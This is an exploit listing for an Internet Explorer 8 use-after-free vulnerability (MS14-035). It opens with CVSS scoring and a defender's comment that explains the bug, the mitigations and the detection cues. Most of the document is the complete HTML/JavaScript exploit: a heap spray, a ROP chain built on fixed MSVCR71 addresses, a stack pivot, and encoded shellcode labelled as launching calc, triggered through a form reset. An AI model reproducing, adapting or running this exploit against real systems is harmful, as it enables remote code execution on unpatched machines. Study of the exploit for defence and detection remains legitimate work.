Internet Explorer 8 MS14-035 Use-After-Free Exploit

2014.11.11
Credit: Ayman Sagy
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!--
  Reviewer note (defender's reading of this listing):
  What it demonstrates: a use-after-free in IE8 (MS14-035) reached through a form reset.
  The <input> element's onpropertychange handler runs crash(), which clears the form's
  innerHTML and calls CollectGarbage() during the reset; the second "title"-attribute
  spray then refills the freed allocation.
  Why it is fragile: every gadget is a hard-coded MSVCR71 address, and the author's
  header says it was tested with Java 6 - presumably because that runtime is what loads
  MSVCR71 at a predictable base (confirm for your environment). Applying MS14-035 and
  removing legacy Java 6 / MSVCR71 from browser processes leaves the chain with no
  fixed module to pivot into.
  Detection cues visible in this page: thousands of <button> elements whose "title"
  attribute holds large, identical unescape("%u....") strings, the 0x450-iteration
  DEPS-style spray of 0x40000-character strings, and an explicit CollectGarbage() call
  inside an event handler.
-->
<!-- Exploit Title: MS14-035 Use-after-free Exploit for IE8 Date: 10 Nov 2014 Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy Tested on: IE8 with Java6 on Windows7 --> <html> <head><title>MS14-035 IE8 Use-after-free Exploit</title></head> <body> <!-- <APPLET id="dummy" code="dummy.class" width=100 height=100> You need to install Java to view this page. </APPLET> --> <div id="mydiv">x</div> <form id="frm"></form> <div id="sprayfrm"></div> <script type="text/javascript"> spraysize = 5000; sprayelement = document.getElementById("sprayfrm"); sprayelement.style.cssText = "display:none"; var data; offset = 0x506; buffer = unescape("%u2020%u2020"); pivot = unescape("%u8b05%u7c34"); // stack pivot // MSVCR71 rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV 
ESP,0x10101010 // calc shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); /* _______0x1cc_____ | | \|/ | Junk ROP Shellcode Pivot Junk 2 3 1 */ while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34"); buffer += rop; buffer += shellcode; while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34"); while (buffer.length < 0x1000) buffer += buffer; data = buffer.substring(0,offset) + pivot + rop + shellcode data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); //obj.style.fontFamily = data.substring(0,0x40000-0x58); sprayelement.appendChild(obj); } block = unescape( // Literal string to avoid heap allocation "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"); blocks = new Array(); for (i = 0; i < spraysize; i++) { // spray 1 blocks.push(document.createElement("button")); 
blocks[i].setAttribute("title",block.substring(0, block.length)); sprayelement.appendChild(blocks[i]); } for (i = spraysize/2; i < spraysize; i++) { // free some blocks blocks[i].setAttribute("title",""); } var newdiv = document.createElement('div'); newdiv.innerHTML = "<textarea id='CTextArea'></textarea>"; document.getElementById("frm").appendChild(newdiv); var newdiv2 = document.createElement('div'); newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>"; document.getElementById("frm").appendChild(newdiv2); document.getElementById("CInput").checked = true; trigger = true; document.getElementById("frm").reset(); function crash() { if (trigger) { document.getElementById("frm").innerHTML = ""; // Free object, trigger bug CollectGarbage(); for (i = spraysize/2; i < spraysize; i++) { // spray 2 blocks[i].setAttribute("title",block.substring(0, block.length)); } } } </script> </body> </html>

References:

https://www.linkedin.com/in/aymansagy

